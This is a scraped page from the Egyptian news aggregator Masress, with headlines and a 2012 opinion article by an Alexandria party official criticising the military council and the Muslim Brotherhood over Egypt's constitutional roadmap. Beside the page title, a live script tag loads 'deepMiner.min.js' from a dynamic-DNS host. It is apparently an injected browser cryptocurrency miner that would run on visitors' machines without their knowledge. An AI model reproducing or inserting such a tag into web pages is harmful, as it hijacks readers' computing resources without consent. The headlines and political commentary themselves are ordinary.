googletag.defineSlot('/21620968445/Masress_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-1446553049-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_1', 'div-gpt-ad-1446553049-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553047-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_3', 'div-gpt-ad-1446553047-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553048-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_2', 'div-gpt-ad-1446553048-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Widget', [[222, 280]], 'div-gpt-ad-374346843-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Widget', 'div-gpt-ad-374346843-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1775746800-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Siteunder', 'div-gpt-ad-1775746800-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); مصرس : الصراع اجل البقاء<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
رئيس جامعة أسيوط بين الطلاب فى انتخابات الاتحاد    بالصور.. وزير الزراعة يتفقد معهد بحوث صحة الحيوان    لأول مرة.. دار الإفتاء تطلق وحدة لأفلام الرسوم المتحركة ردا على المتطرفين    سيول الخير تعم وادي فيران.. وأمطار على نويبع.. صور    السيسي: مصر ملتزمة بدعم علاقات التعاون مع غينيا    بالصور.. حلقة نقاشية حول تعميم التنوع البيولوجي في الطاقة والتعدين     وزارتا التموين والأوقاف يتعاونان لتوزيع السكر والأرز على المحتاجين    رئيس الطرق والكبارى: 63 مليار جنيه لتطوير الطرق بالمحافظات    أوبر تسجل خسارة مليار دولار فى 3 أشهر مع تباطؤ نمو الحجوزات    وزير التنمية المحلية: مبادرة شبابية تنهي أزمة البطاطس في كفر الشيخ    محافظ السويس يطالب العمال ببذل الجهد للانتهاء من إنشاء محطة صرف بحي الجناين    فيديو| الجامعة العربية: الاحتلال يتحدى الشرعية الدولية بالتعدي على الفلسطينين    «قُتل بحقنه مُخدر وتمت تجزئته».. السعودية تعلن تفاصيل مقتل جمال خاشقجي    فلسطيني يصيب 4 ضباط إسرائيليين بسكين    دعوات لفحص المعاملات المالية لحزب البديل بشكل كامل بعد تلقيه تبرعات مشبوهة    النيابة السعودية توضح دور "ولي العهد" في مقتل "خاشقجي"    شاهد.. لقطات مرعبة من حرائق كاليفورنيا    رئيس وزراء ماليزيا: نقل السفارة الأسترالية من تل أبيب إلى القدس غير مفيد    الزمالك يدرس إعارة «أبو الفتوح» لأحد أندية الدوري    هشام محمد يواصل برنامجه التأهيلي    تقرير.. هل يتم استبعاد باريس ومانشستر سيتي من دوري أبطال أوروبا؟    مصدر بالمصري ليلا كورة: نرغب في ضم باسم مرسي    كسر ماسورة مياه يصيب محور المشير بارتباك مروري    حبس صاحب إسطبل خيول لهتكه عرض طفل بالبساتين    حزب الوفد ينعي للأمة المصرية البطل الشهيد ساطع النعماني    حبس امرأتين بينهما «كوافيرة» عامين للاتجار بالمخدرات ببولاق الدكرور    إصابة 15 شخصا فى حادث انقلاب سيارة بالفيوم    بالصور| انفجار ماسورة مياه بمحور المشير.. وارتباك بحركة المرور بالتجمع    ضبط 11 من العناصر الخطرة في حملة أمنية بالقليوبية    شاهد.. لوحات إرشادية جديدة للمتحف المصرى بالتحرير احتفالا بعيده ال116    الأقصر تحتضن مهرجان الشعر العربي برعاية سلطان القاسمي    تعرف على موعد حفل شيرين الجديد    يواصل التصوير في مصر الجديدة    شاهد..ياسمين رئيس في شوارع بيروت    القول الحق فى مَولد خير الخلق    طارق سلمان: كلية طب الأزهر تقود الجامعة في تصنيفات عالمية    وزير المالية ل«الشروق»: الالتزام بالبرامج البيئية شرط توفير التمويل للمشروعات    محافظ أسوان يهنئ الدكتور مجدي يعقوب بمناسبة عيد ميلاده    الأرصاد تناشد المواطنين بضرورة ارتداء الملابس الشتوية    حكم الجلوس في الصلاة لغير القادر    وزير الرياضة: مصر تسعى للدخول ضمن أفضل 10 دول في الرياضة التنافسية    الخبر التالى:    30 يونيو.. الانتهاء من الأعمال الإنشائية بمستشفى جهينة المركزي    إغلاق الأكاديمية الدولية للتعليم بسبب العمل بدون ترخيص    ميندي لاعب سيتي يخضع لجراحة في الركبة    غدا.. "شارك حبك لحبيبك" أمسية دينية لأوقاف الإسماعيلية    محافظ الأقصر يلتقى وفد مشروع إعادة اكتشاف الأصول التراثية لإسنا    مكتبة مصر الجديدة تظهر بإطلالة جديدة في عيد ميلادها ال 73    علي معلول ومحمد نجيب يواصلان التأهيل في الأهلي    أنباء عن وقف التحالف العربي عملياته في الحديدة    " جروس" يصل القاهرة اليوم ليستكمل تدريبات الزمالك    تناول 4 فناجين قهوة يومياً يقى من مرض السكر    شاهد.. الكلية الفنية العسكرية تحصد جائزتين    دراسة: البشر أفضل في تذكر الأسماء عن الوجوه    بيع قلادة ماري أنطوانيت ب36 مليون دولار في مزاد بجنيف    بوضوح    كلام بحب    .. والسلام ختام    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





الصراع اجل البقاء
نشر في شباب مصر يوم 01 - 04 - 2012

المتأمل للبيانات المتبادله بين المجلس الأعلى للقوات المسلحه وجماعه الاخوان المسلمين لا يأمل خيرا لهذه الأمه فما انطوت عليها هذه البيانات من تهديدات متبادله وتلميحات لا تنبئ بخير ولا تصدر عن رجال دوله ومهما كان رأينا فى هذه البيانات فما يعنينا نحن المواطنون هو مستقبل هذا الوطن والمرحله الحرجه التى نمر بها جميعا
لقد آثر الفريق الذى قال "لا" فى مارس من العام الماضى رغم قناعته بصواب موقفه فى حينه التخلى عن هذا الموقف وافساح المجال عريضا للمضى قدما فى مخطط الهلفطه الدستوريه الذى اقترحه المجلس وروج له المتلهفون على السلطه حتى قبل أن ينصرف الثوار من الميدان فى 11فبراير
لم يكن المجلس العسكرى ليجرؤ على تمرير مخططه فى حينه لولا الدعم الحاشد والترويج الفج لهذا المخطط بدعاوى يذكرها الجميع ولم يكن خافيا زيفها أو نفاقها ناهيك عن مخالفتها لأبسط قواعد الفقه الدستورى الذى أجمع عليه كل الخبراء -ليس هذا فقط-ولكن سار علي نهجه كل من خاض ذات التجربه من دول الربيع العربى وكلما حاول هذا الفريق قدر المتاح له من حريه أن يصحح وينبه وينصح ويرجو لم يلق مقابل هذا سوى التسفيه والتخوين والعرقله ناهيك عن التصفيه والسجن والسحل والقتل وفقأ العيون وهتك الأعراض
ومضى الحلف فى تحقيق مخططه حتى قارب النهايه وقد أوفى الحليف بوعده وحقق لحليفه مبتغاه وحان له أن يستحق المقابل فهل يقبل منه التنكر للاتفاق علما بأن رصيد الحليف لدى حليفه ملئ بالمآسى والذكريات الأليمه ولئن كان هذا الأخير يراهن على الشارع فقد فات الأوان وقد انفضح الحلف ومخططه ولم يعد يجدى الدجل والتزييف وحتى اذا أفلح الساحر فماذا يجدى السحر أمام بطش الفرعون
ما يعنينا اليوم هو اصلاح ما يمكن اصلاحه وذلك يتطلب منكم العوده الى الحق والتنازل عن غرور الاستعلاء واعطاء الأمر لأهله وهم من هم قمم فى الفقه الدستورى لايدانيهم فى هذا العلم فى المنطقه دان بل فى الشرق الأوسط بأجمعه بلا مكابر فليسطروا لمصر مدونه دستوريه تليق بطموحات المصريين وتحول بين الفسادبنصوص محكمه يحرسها الشعب ويعض عليها بالنواجذ وبكم أو بغيركم سيفعل ذلك الشعب الذى هب فى 25يناير ليستعيد لمصر حريتها وكرامتها وفضلتم الالتفاف وراء ظهره ولازال يأمل منكم الخير الا اذا اخترتم طريق الضلال
بقلم
م / مصطفى خميس السيد
امين الاعلام بحزب الجبهة الديمقراطية بأمانه الاسكندرية


انقر هنا لقراءة الخبر من مصدره.